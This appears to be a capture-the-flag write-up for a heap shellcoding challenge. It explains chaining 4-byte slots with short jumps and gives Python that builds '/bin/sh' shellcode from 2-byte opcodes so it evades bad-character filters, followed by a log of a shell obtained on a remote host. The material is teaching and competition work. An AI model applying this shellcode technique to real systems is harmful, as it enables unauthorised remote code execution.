Simple shellcoding challenge from a Raytheon SI hiring/meet-greet/CTF event.
Basically, you provide data four bytes at a time. Each four bytes goes into the first half of an 8-byte allocation; the second four bytes of that allocation are a pointer to the next allocation.
The challenge is less difficult than it first appears. Looking at the x86 opcodes, there is no room for a direct JMP or CALL (the 32-bit displacement alone takes four bytes). However, because of the heap layout the allocations sit a fixed distance apart, so a two-byte short relative jump ('jmp $+offset') at the end of each four-byte piece is enough to skip the pointer and land in the next one.
The remaining difficulty is then doing useful work with only two bytes of instructions per allocation (the other two go to the jump). I chose to rewrite the pwntools pushstr method to use only 2-byte opcodes, building each dword in eax by INCing and SHIFTing it and then PUSHing eax.
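As an added example (not the push.py from this repo), the following Python builds such a pushstr out of 2-byte instructions, lays it out in 4-byte slots with the trailing short jump, and checks the result with a tiny interpreter for that instruction subset. The distance between consecutive allocations is assumed to be 8 bytes here; the real jump displacement has to be taken from the challenge binary's heap layout, and only the STRIDE constant changes with it.

```python
"""Rebuild a pwntools-style pushstr out of two-byte x86 (32-bit) instructions.

Every 4-byte slot the challenge gives us holds one 2-byte instruction
followed by a 2-byte short jump over the pointer into the next slot.
"""
import struct

# Two-byte encodings (one-byte instructions are padded with nop).
XOR_EAX_EAX = b"\x31\xc0"   # xor eax, eax
SHL_EAX_1 = b"\xd1\xe0"     # shl eax, 1
INC_EAX = b"\x40\x90"       # inc eax ; nop
PUSH_EAX = b"\x50\x90"      # push eax ; nop

# Assumption: consecutive allocations start 8 bytes apart. Read the real
# value from the binary; it only changes the jmp displacement.
STRIDE = 8


def build_dword_ops(value):
    """Instructions that leave `value` in eax, built bit by bit from the MSB:
    shift left, then inc if the bit is set. Shifts before the first set bit
    are skipped because eax is still zero."""
    ops = [XOR_EAX_EAX]
    started = False
    for bit in range(31, -1, -1):
        if started:
            ops.append(SHL_EAX_1)
        if (value >> bit) & 1:
            ops.append(INC_EAX)
            started = True
    return ops


def pushstr_ops(s):
    """Push `s` NUL-terminated, dword by dword, so esp ends up pointing at it."""
    data = s + b"\x00"
    data += b"\x00" * (-len(data) % 4)
    dwords = struct.unpack("<%dI" % (len(data) // 4), data)
    ops = []
    for dw in reversed(dwords):   # last dword goes deepest on the stack
        ops += build_dword_ops(dw)
        ops.append(PUSH_EAX)
    return ops


def chunk(ops, stride=STRIDE):
    """Lay each op out as <op><jmp rel8> in a 4-byte slot.
    The jmp ends at slot offset 4 and must land at the next slot's start,
    so rel8 = stride - 4 (nasm: jmp $+(stride-2))."""
    rel = stride - 4
    if not 0 <= rel < 0x80:
        raise ValueError("stride does not fit a short forward jump")
    return [op + bytes([0xEB, rel]) for op in ops]


def emulate(chunks, stride=STRIDE):
    """Minimal interpreter for the subset above. Runs the two instruction
    bytes of each slot, verifies the short jump really lands on the next
    slot, and returns the stack contents from esp upwards."""
    eax, stack = 0, b""
    for c in chunks:
        if len(c) != 4 or c[2] != 0xEB or 4 + c[3] != stride:
            raise ValueError("slot %s does not chain to the next one" % c.hex())
        pos = 0
        while pos < 2:
            two, one = c[pos:pos + 2], c[pos]
            if two == XOR_EAX_EAX:
                eax, pos = 0, pos + 2
            elif two == SHL_EAX_1:
                eax, pos = (eax << 1) & 0xFFFFFFFF, pos + 2
            elif one == 0x40:                     # inc eax
                eax, pos = (eax + 1) & 0xFFFFFFFF, pos + 1
            elif one == 0x50:                     # push eax (stack grows down)
                stack, pos = struct.pack("<I", eax) + stack, pos + 1
            elif one == 0x90:                     # nop
                pos += 1
            else:
                raise ValueError("unsupported opcode %#x" % one)
    return stack


if __name__ == "__main__":
    slots = chunk(pushstr_ops(b"/bin/sh"))
    print(len(slots), "slots; first:", slots[0].hex())
    assert emulate(slots) == b"/bin/sh\x00"
```

Because the value is built with inc and shl only, the immediate never appears in the payload: the whole thing is made of the bytes 31 c0 d1 e0 40 90 50 eb plus the displacement, so bad-character filters are a non-issue at the cost of many more slots per dword. The same chunk() layout carries any other 2-byte instruction that the rest of the shellcode needs.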
```
python push.py
[+] Opening connection to 107.170.0.195 on port 15232: Done
[+] Recieving all data: Done
[*] Switching to interactive mode
$ id
uid=1001(ll) gid=1001(ll) groups=1001(ll)
```